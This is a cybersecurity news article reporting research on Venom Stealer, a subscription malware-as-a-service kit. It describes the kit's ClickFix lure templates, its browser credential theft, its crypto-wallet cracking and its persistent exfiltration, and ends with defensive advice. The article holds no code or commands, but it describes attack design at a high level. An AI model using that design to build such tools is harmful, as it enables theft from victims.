TechTarget and Informa Tech’s Digital Business Combine. TechTarget and Informa TechTarget and Informa Tech’s Digital Business Combine. Together, we power an unparalleled network of 220+ online properties covering 10,000+ granular topics, serving an audience of 50+ million professionals with original, objective content from trusted sources. We help you gain critical insights and make more informed decisions across your business priorities. Dark Reading Resource Library Black Hat News Omdia Cybersecurity Advertise Newsletter Sign-Up Newsletter Sign-Up Cybersecurity Topics Related Topics Application Security Cybersecurity Careers Cloud Security Cyber Risk Cyberattacks & Data Breaches Cybersecurity Analytics Cybersecurity Operations Data Privacy Endpoint Security ICS/OT Security Identity & Access Mgmt Security Insider Threats IoT Mobile Security Perimeter Physical Security Remote Workforce Threat Intelligence Vulnerabilities & Threats Recent in Cybersecurity Topics Application Security Axios NPM Package Compromised in Precision Attack Axios NPM Package Compromised in Precision Attack by Alexander Culafi Mar 31, 2026 5 Min Read Sponsored Content The Future of Application Security: AI Bots, APIs & Identity Explained The Future of Application Security: AI Bots, APIs & Identity Explained by Terry Sweeney Mar 31, 2026 World Related Topics DR Global Middle East & Africa Asia Pacific Latin America Recent in World See All Application Security Real-Time Banking Trojan Strikes Brazil's Pix Users Real-Time Banking Trojan Strikes Brazil's Pix Users by Alexander Culafi Mar 13, 2026 4 Min Read Threat Intelligence Iran's Cyber-Kinetic War Doctrine Takes Shape Iran's Cyber-Kinetic War Doctrine Takes Shape by Alexander Culafi Mar 6, 2026 4 Min Read The Edge DR Technology Events Related Topics Upcoming Events Podcasts Webinars SEE ALL Resources Related Topics Resource Library Newsletters Podcasts Reports Videos Webinars White Papers Partner Perspectives Dark Reading Resource Library Endpoint Security Cyberattacks & Data Breaches Remote Workforce Threat Intelligence News Venom Stealer MaaS Platform Commoditizes ClickFix Attacks A new service on the cybercrime market provides automated capabilities to create persistent information-stealing social engineering attacks. Elizabeth Montalbano , Contributing Writer April 1, 2026 4 Min Read Source: Gerry Pearce via Alamy Stock Photo Developing ClickFix-style attacks has just gotten much easier, thanks to a newly distributed malware-as-a-service (MaaS) platform that automates every step of the social engineering technique for would-be attackers, researchers have found. A developer operating under the name "VenomStealer" is selling a MaaS platform of the same name on cybercriminal forums and networks, researchers from BlackFog revealed in a report published Tuesday. Venom Stealer allows attackers to create a persistent, multistage pipeline from initial infection to credential theft, cryptocurrency wallet access, and data exfiltration based on the initial ClickFix interaction. "Venom stands out from commodity stealers like Lumma, Vidar, and RedLine because it goes beyond credential harvesting," BlackFog founder and CEO Darren Williams wrote in the report . "It builds ClickFix social engineering directly into the operator panel, automates every step after initial access, and creates a continuous exfiltration pipeline that does not end when the initial payload finishes running." Related: The Forgotten Endpoint: Security Risks of Dormant Devices Touted on cybercriminal forums as "the Apex Predator of Wallet Extraction," the platform is sold on a subscription basis for $250 a month, or $1,800 for lifetime access, according to Williams. There a vetted application process, Telegram-based licensing , and a 15% affiliate program for Venom Stealer, which delivers a native C++ binary payload compiled per-operator from the web panel. Unlike traditional stealers that simply execute once, exfiltrate data, and exit, Venom Stealer continuously scans the system to harvests credentials, session cookies, and browser data; targets cryptocurrency wallets and stored secrets; and automates wallet cracking and fund draining, according to BlackFog's report. Moreover, despite its relatively new presence on the commodity MaaS market, the operation behind Venom Stealer already appears to be a thriving business, Williams noted. So far in the month of March alone, its developer has already shipped multiple updates to the platform. Step-By-Step ClickFix by Design An attack built with Venom Stealer begins when a prospective victim lands on a ClickFix page hosted by the operator. The platform ships four templates per platform (Windows and macOS), a fake Cloudflare CAPTCHA , a fake OS update, a fake SSL certificate error, and a fake font install page. Each one asks the target to open a Run dialog or Terminal, copy and paste a command, and hit Enter. "Because the target initiates execution themselves, the process appears user-initiated and bypasses detection logic built around parent-child process relationships," Williams explained. Related: Coruna, DarkSword & Democratizing Nation-State Exploit Kits Windows payloads available in the kit include .exe, .psi (or fileless via PowerShell), .hta, and .bat options, while macOS templates use bash and curl, he said. The platform also gives operators the capability to configure custom domains through Cloudflare DNS, so the panel URL never appears in the command. Once the payload executes, it sweeps every Chromium and Firefox-based browser on the machine, extracting saved passwords, session cookies, browsing history, autofill data, and cryptocurrency wallet vaults from every profile. Moreover, there are evasion capabilities built into the execution mode, with the password encryption in versions 10 and 20 of Chrome bypassed using a silent privilege escalation that extracts the decryption key without triggering any user account control (UAC) dialog, thus leaving no forensic artifacts, Williams noted. The attack chain also captures system fingerprinting and browser extension inventories alongside the credentials, giving cybercriminals a complete profile of each target, he added. "All of this data leaves the infected device immediately, with little or no local staging or delay," Williams wrote. "Without adequate visibility into outbound traffic, detecting this activity becomes significantly more difficult." Related: Is the FCC's Router Ban the Wrong Fix? Persistent Data-Theft Pipeline The attack transfers any discovered wallet data to a server-side, GPU-powered cracking engine that auto-cracks crypto wallets such as MetaMask, Phantom, Solflare, Trust Wallet, Atomic, Exodus, Electrum, Bitcoin Core, Monero, and Tonkeeper. Additionally, a March 9 update to Venom Stealer also added a File Password and Seed Finder, which search the filesystem for locally saved seed phrases, feeding anything found into the cracking pipeline. "Even targets who avoid saving credentials in their browser are at risk if seed phrases exist anywhere on the machine," Williams wrote. And while some newer infostealer variants do have some persistence capability, Venom goes further than them all by staying active after the initial compromise and continuously monitoring Chrome’s Login Data, capturing newly saved credentials in real-time, he added. "This undermines credential rotation as an incident response measure and extends the exfiltration window beyond the initial infection," Williams observed. "As a result, determining the full scope of the ongoing compromise becomes more difficult." How to Reduce ClickFix Exposure Researchers from ProofPoint first spotted ClickFix attacks about two years ago , and the technique has taken off with the cybercriminal community since then. The attack instills urgency among targets by telling them something is wrong that they must fix or update, and then uses otherwise benign CAPTCHA-style prompts to lure them into a false sense of security. The aim is to trick a user into executing malicious prompts against themselves. Organizations can reduce exposure to threats like Venom Stealer by restricting PowerShell execution, disabling the Run dialog for standard users via Group Policy, and training employees to recognize ClickFix-style social engineering , Williams advised. "Once the payload is running, the attack chain depends on data leaving the device," he wrote. "Monitoring and controlling outbound traffic become important at this point, because it provides an opportunity to detect or prevent exfiltration activity and limit the impact of credential theft and subsequent actions." About the Author Elizabeth Montalbano Contributing Writer Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking. See more from Elizabeth Montalbano Want more Dark Reading stories in your Google search results? Add Us Now More Insights Industry Reports Frost Radar™: Non-human Identity Solutions 2026 CISO AI Risk Report Cybersecurity Forecast 2026 The ROI of AI in Security ThreatLabz 2025 Ransomware Report Access More Research Webinars Building a Robust SOC in a Post-AI World Retail Security: Protecting Customer Data and Payment Systems Rethinking SSE: When Unified SASE Delivers the Flexibility Enterprises Need Securing Remote and Hybrid Work Forecast: Beyond the VPN AI-Powered Threat Detection: Beyond Traditional Security Models More Webinars Editor's Choice Cybersecurity Operations Why Stryker's Outage Is a Disaster Recovery Wake-Up Call Why Stryker's Outage Is a Disaster Recovery Wake-Up